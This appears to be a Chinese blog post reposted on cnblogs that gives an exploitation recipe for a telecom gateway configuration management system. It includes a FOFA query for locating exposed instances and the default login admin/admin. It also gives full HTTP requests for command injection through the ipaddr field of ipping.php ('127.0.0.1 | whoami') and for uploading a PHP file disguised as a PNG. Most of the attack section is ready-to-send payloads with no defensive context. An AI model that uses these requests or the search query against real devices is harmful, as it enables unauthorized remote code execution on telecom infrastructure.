首页 > 其他分享 >电信网关配置管理系统漏洞

电信网关配置管理系统漏洞

时间:2024-05-11 16:57:49浏览次数:18  
标签:WebKitFormBoundaryB33cDIYAxIrc9MsS zh form 电信网 配置管理 Content 系统漏洞 ------ data

电信网关配置管理系统漏洞

  • fofa语句:
    body="img/dl.gif" && title="系统登录"

1.弱口令漏洞

  • 弱口令:
    admin|admin

2.RCE漏洞

  • RCE
    POST /manager/ipping.php HTTP/1.1
Host:  
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,zh-TW;q=0.8,zh-HK;q=0.7,en;q=0.6
Cookie: PHPSESSID={弱口令登录获取PHPSESSID} 
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 25

ipaddr=127.0.0.1 | whoami

3.文件上传漏洞

  • 文件上传
    POST /manager/teletext/material/upload.php HTTP/1.1
Host:  
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,zh-TW;q=0.8,zh-HK;q=0.7,en;q=0.6
Cookie: PHPSESSID=vsdl33qjn3fbslu7k3r99di5n3
Connection: close
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryB33cDIYAxIrc9MsS
Content-Length: 786

------WebKitFormBoundaryB33cDIYAxIrc9MsS
Content-Disposition: form-data; name="fileToUpload"; filename="1.php"
Content-Type: image/png

<?php phpinfo();?>
------WebKitFormBoundaryB33cDIYAxIrc9MsS
Content-Disposition: form-data; name="type"

img
------WebKitFormBoundaryB33cDIYAxIrc9MsS
Content-Disposition: form-data; name="w"

1280
------WebKitFormBoundaryB33cDIYAxIrc9MsS
Content-Disposition: form-data; name="h"

720
------WebKitFormBoundaryB33cDIYAxIrc9MsS
Content-Disposition: form-data; name="userid"

1000398
------WebKitFormBoundaryB33cDIYAxIrc9MsS
Content-Disposition: form-data; name="appid"

5
------WebKitFormBoundaryB33cDIYAxIrc9MsS
Content-Disposition: form-data; name="uploadtime"

20230603_231117_1685805077294
------WebKitFormBoundaryB33cDIYAxIrc9MsS--

标签:WebKitFormBoundaryB33cDIYAxIrc9MsS,zh,form,电信网,配置管理,Content,系统漏洞,------,data
From: https://www.cnblogs.com/lovesaber157/p/18186778

相关文章

  • 配置管理与IT资产管理:差异与协同共生
    在信息技术日新月异的今天,高效、可靠的IT服务管理成为企业竞争力的关键一环。ITIL4 作为业界公认的IT服务管理框架,为我们提供了一套全面而系统的实践指南。在这一框架下,配置管理和IT资产管理作为两大核心实践,虽各有侧重,却又相辅相成,共同构建起IT服务的坚实基石。本文将深入探讨这......
  • jenkins安装配置管理(旧)
    jenkins安装配置管理(旧)jenkins安装配置管理1.安装依赖yuminstall-yjava-1.8.0-openjdkjava-1.8.0-openjdk-develjava-version2.添加yum仓库源下载yum仓库源配置文件wget-O/etc/yum.repos.d/jenkins.repohttps://pkg.jenkins.io/redhat-stable/jenkins.repo导......
  • 在Linux中,如何使用Puppet进行配置管理?
    Puppet是一个开源的配置管理工具,用于自动化地管理大量服务器的配置。它使用一个集中式的服务器,称为Puppetmaster,以及安装在每个被管理服务器上的代理,称为Puppetagent。以下是在Linux中使用Puppet进行配置管理的基本步骤:1.安装Puppet安装PuppetServer(Master):选择一台服......
  • 《安富莱嵌入式周报》第336期:开源计算器,交流欧姆表,高性能开源BLDC控制器,Matlab2024a,操
    周报汇总地址:http://www.armbbs.cn/forum.php?mod=forumdisplay&fid=12&filter=typeid&typeid=104 本周更新一期视频教程:BSP视频教程第30期:UDSISO14229统一诊断服务CAN总线专题,常用诊断执行流程精讲,干货分享,图文并茂https://www.armbbs.cn/forum.php?mod=viewthread&tid=12......
  • 微服务:配置管理
    为什么引入了配置管理?微服务内重复配置过多,维护成本较高业务配置经常变动,每次修改都要重启服务网关路由配置写死,如果改写需要重启网关 配置文件共享首先在nacos中创建一个配置:在配置管理的配置列表中,右边点击加号填写dataId,修改配置内容,支持使用${value}读......
  • Jenkins 权限配置管理-github用户权限管理
    写在前面的话背景:在一个企业研发部门内部,可能存在多个运维人员,而这些运维人员往往负责不同的项目,但是有可能他们用的又是同一个Jenkins的不同用户。那么我们就希望实现一个需求,能够不同的用户登录Jenkins以后看到不同的项目。Jenkins提供了简单的权限管理,我们可以在 系统......
  • 项目配置管理
     ......
  • 高项(5)-人力资源管理-沟通管理-干系人管理-风险管理-采购管理-合同管理-配置管理-知识
    十大管理-项目人力资源管理(4)人力资源管理过程包括:规划人力资源管理组建项目团队建设项目团队管理项目团队输入、输出、工具和技术人力资源管理(规组建管)过程名输入输出工具和技术规划人力资源管理(1)活动资源需求;(2)项目管理计划;(3)事业环境因素;(4)组织过程资产人力资源管理计......
  • Git 系列:简介安装以及配置管理
    目录简介安装简介Centos安装配置管理githelp概要选项示例git-docgitconfig概要选项变量示例初始化配置简介安装简介https://git-scm.com/Git是一个开源的分布式版本控制系统,用于有效、高速地处理从小到大的项目版本管理。它最初由Linux之父LinusTorvalds设计开发,旨在帮助管......
  • Lbtorch版本分为release和debug,要对应自己的配置管理器
    1.libtorch版本必须和pytorch版本一致例如libtorch版本1.8.2,而pytorch版本为1.8.0,这两个版本就是一致的,只要保持版本号前两位相同即可libtorch资源:[LibTorch&Win]各版本LibTorch下载_linux下libtorch的gpu版本下载-CSDN博客2.libtorch安装LibTorch的安装、配置与使用-CSD......

赞助商

阅读排行

网站主页关于我们联系我们网站地图

本网站内容转载自其他媒体,侵权联系[admin##ips99.com]。

Copyright © 2020-2023 IPS99 版权所有 IPS99